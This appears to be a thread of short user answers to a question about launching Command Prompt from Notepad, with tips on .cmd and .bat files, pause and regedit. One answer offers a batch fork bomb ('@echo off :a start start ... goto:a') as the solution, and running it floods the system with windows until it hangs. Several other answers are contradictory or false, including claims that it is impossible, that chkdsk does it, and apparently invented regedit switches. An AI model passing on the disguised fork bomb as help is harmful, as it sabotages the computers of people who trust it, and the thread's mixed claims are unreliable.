I am not exactly sure what you are asking, but I will try:
if you have a notepad file that you want to run in command prompt, you need to save it as a (DOT)cmd extension instead of a (DOT)txt. the icon then should look like a blank dialog box with a gear i think.
You just simply type the same commnads you would in command prompt in notepad. You will want to separate each command line by pressing enter.
To simply call up the command prompt window using notepad, type in notepad:
command
then save as command.cmd
Also, with some commands you might want to insert a pause before going on to the next command. To do this just hit enter and type pause, then hit enter again and insert your next command. Here's an example:
Open up notepad and type:
command
pause
ipconfig
pause
then save as test.cmd on your desktop. Then exit notepad, click on the icon that says "test", and watch it work :)
Edit:
1. Open notepad
2. Type in "command.com" (without apostriophies)
3. Save as %type in a name of a file%.bat (ideally on Desktop)
4. You're done. Double click the new file you created
Here are the steps to start command prompt using notepad:
1. Open notepad in Windows. To open notepad, click the start button, accessories, then click notepad.
2. Type "start cmd" without quotes.
3. Save it to desktop and name it anything you like but with a .bat file extension.
4. Double click your batch file and it will start cmd
You can't. Notepad is strictly a text editor and has no ability to launch programs.
It is called Command Prompt and it comes with Windows operating systems NT through Vista. You can access the command prompt by clicking Start/Run... , typing CMD, and then press ENTER or click the OK button.
Just run "regedit" command from DOS..
You can start registry editor using command prompt by using "regedit" command. You can also use registry tools such as "regedit /restore" or "regedit /fix" etc.
don't know how do do it using notepad but can use excell and create a hyperlink with this address file:///c:/windows/system32/cmd.exe and follow the link
If your using vista or windows 7 click start and type "cmd"
when using command prompt, after you give it a command, press the enter button. Command prompt will then carry out the task and will automatically go to the next line.
the thing that you have to do is nothing but just type in the following @echo off :a start start start start start start goto:a
Its not possible from DOS Prompt..
That's impossible.
You can do it by using "chkdsk" command.
Run program.exeorthe name of the program, with or without .exe (if the command prompt is in the same directory/folder of the executable)
Simply open the "Run" command. Then type in "Wordpad" and it will start up. If not then it dose not exist on your pc, try "Notepad" if wordpad dose not work.